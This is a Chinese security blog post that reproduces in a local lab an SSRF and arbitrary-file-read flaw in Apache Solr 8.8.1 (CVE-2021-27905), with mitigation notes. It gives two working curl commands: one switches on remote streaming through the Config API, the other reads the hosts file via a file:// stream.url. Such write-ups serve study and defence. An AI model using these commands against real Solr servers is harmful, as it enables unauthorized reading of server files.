首页 > 其他分享 >漏洞复现:Apache solr

漏洞复现:Apache solr

时间:2024-08-05 23:23:48浏览次数:8  
标签:Solr 3333 漏洞 复现 Apache new solr

目录

漏洞简述

环境搭建

漏洞复现

漏洞检测

漏洞修复


漏洞简述

Apache Solr是一个开源的搜索服务,使用Java编写、运行在Servlet容器的一个独立的全文搜索服务器,是Apache Lucene项目的开源企业搜索平台。

该漏洞是由于没有对输入的内容进行校验,攻击者可利用该漏洞在未授权的情况下,构造恶意数据执行SSRF攻击,最终造成任意读取服务器上的文件。

影响版本

  • Apache Solr <=8.8.1 (latest) ,通杀所有版本,官方拒绝修复

环境搭建

下载链接:链接: https://pan.baidu.com/s/1h4MM2XAOWspfTh4QOwGjhw?pwd=6dtf 提取码: 6dtf

解压到小蓝皮(phpstudy_pro)的根目录

在 bin 目录的地址栏输入 cmd 打开终端,开启一个端口

solr start -p 3333

在浏览器搜索

127.0.0.1:3333

如果127.0.0.1不行的话就使用 ipconfig 命令查看本机IP,用本机 IP 去访问

此时 Solr 已经在 server/solr 目录下已经创建了名字为 new_core 的文件夹

把 solr-8.8.1\server\solr\configsets\_default 下的 conf 的文件夹复制到 solr-8.8.1\server\solr\new_core 目录里

然后再返回页面点击 Add Core

漏洞复现

通过访问以下地址可以看到当前的 Core 名称

http://127.0.0.1:3333/solr/admin/cores?indexInfo=false&wt=json

结合上一步获取到的 Core 名称访问以下地址可查看详细信息

http://127.0.0.1:3333/solr/new_core/config

使用 curl 对 Config API 打开默认关闭的requestDispatcher.requestParsers.enableRemoteStreaming开关

curl -d "{ "set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":true}}" http://192.168.110.24:3333/solr/new_core/config -H "Content-type:application/json"

使用 curl 对 stream.url 参数利用 file 伪协议读取本机的 hosts 的文件

curl "http://192.168.110.24:3333/solr/new_core/debug/dump?param=ContentStreams" -F "stream.url=file:///C:\Windows\System32\drivers\etc\hosts"

漏洞检测

GitHub - Henry4E36/Solr-SSRF: Apache Solr SSRF(CVE-2021-27905)

GitHub - W2Ning/Solr-SSRF: CVE-2021-27905

漏洞修复

  • 将 Solr 端口仅对内网开放,并配置访问策略
  • 无修复版本

标签:Solr,3333,漏洞,复现,Apache,new,solr
From: https://blog.csdn.net/weixin_68416970/article/details/140777862

相关文章

  • 三十种未授权访问漏洞复现 合集( 五 )
     未授权访问漏洞介绍        未授权访问可以理解为需要安全配置或权限认证的地址、授权页面存在缺陷,导致其他用户可以直接访问,从而引发重要权限可被操作、数据库、网站目录等敏感信息泄露。---->目录遍历        目前主要存在未授权访问漏洞的有:NFS服务,Sa......
  • Maven项目报错:failed to execute goal org.apache.maven.plugins:maven-compiler-plug
    创建了一个maven项目,然后在编译时运行错误:“failedtoexecutegoalorg.apache.maven.plugins:maven-compiler-plugin:3.13.0:compile(default-compile)onprojectforum:thepluginorg.apache.maven.plugins:maven-compiler-plugin:3.13.0requiresmavenversion3.6.3-......
  • 复现opendrivelab的“点云预测”项目
    本文的主要工作就是复现下述论文中的算法。该论文全称:VisualPointCloudForecasting论文内容在此不做过多介绍,直接上项目。一、准备工作首先通读readme.md文件的内容,了解所需要的相关依赖和数据等内容。一定要多读几遍,不要扫一眼就过了。接下来就是部署环境,根据readme......
  • SourceCodester v1.0 SQL 注入漏洞(CVE-2023-2130)靶场复现
    SourceCodesterPurchaseOrderManagementSystemv1.0是一个实用的工具,适合希望优化采购流程的企业和组织靶场界面直接放sqlmap跑爆数据库爆数据表爆字段爆内容-用户名爆内容-密码sqlmap的md5碰撞sqlmap所有命令点击查看代码爆数据库pythonsqlmap.py-u......
  • Jorani远程命令执行漏洞 CVE-2023-26469靶场复现
    靶场界面点击查看exp↓↓↓"""vulnerabilitycoveredbyCVE-2023-26469"""importreadlineimportrequestsimportdatetimeimportsysimportreimportbase64importrandomimportstringrequests.packages.urllib3.disable_warnings(requ......
  • 易捷OA协同办公软件 ShowPic 任意文件读取漏洞复现
    0x01产品简介易捷OA协同办公软件是在“让管理更简单”和“实时协同”的理念的指导下,”本着“简约、实时、快捷、省钱”的产品定位,结合数千家客户的管理实践和当前最先进的IT技术开发出来的全新一代协同产品,在云计算、全文检索、手机应用、企业即时通讯等多方面取得突破性创新......
  • 【漏洞复现】LiveBOS UploadFile.do 任意文件上传漏洞(XVE-2023-21708)
    0x01产品简介LiveBOS(LiveBusinessObjectSystem)是顶点软件自主研发的以业务对象建模为核心的业务中间件及其集成开发工具,它通过业务模型建立直接完成软件开发的创新模式,支持各类基于WEB的专业应用软件与行业大型应用的开发。LiveBOS系统由三个相对独立的产品构成:运行支......
  • 方天云智慧平台系统 GetSalQuatation SQL注入漏洞复现
    0x01产品简介方天云智慧平台系统,作为方天科技公司的重要产品,是一款面向企业全流程的业务管理功能平台,集成了ERP(企业资源规划)、MES(车间执行系统)、APS(先进规划与排程)、PLM(产品生命周期)、CRM(客户关系管理)等多种功能模块,旨在通过云端服务为企业提供数字化、智能化的管理解决方案......
  • 未授权访问漏洞(漏洞复现合集)
    目录一:Redis未授权访问漏洞*步骤一:进入vulhub目录使用以下命令启动靶机...步骤二:在Kali上安装redis程序进行服务的链接步骤三:可以直接连接执行命令且不需要认证说明存在未授权访问漏洞...下载以下攻击项目...步骤四:使用工具执行以下命令获取目标的命令执行环境,交互......
  • 深入剖析Apache Flink的状态后端
    ApacheFlink的状态后端是其状态管理的核心组件,负责存储和管理Flink程序的状态信息。状态后端的选择直接影响到Flink程序的容错能力、性能以及与外部系统的集成能力。本文将详细介绍Flink中的不同状态后端,包括它们的工作原理、特点、适用场景以及如何配置和使用。一、Flink......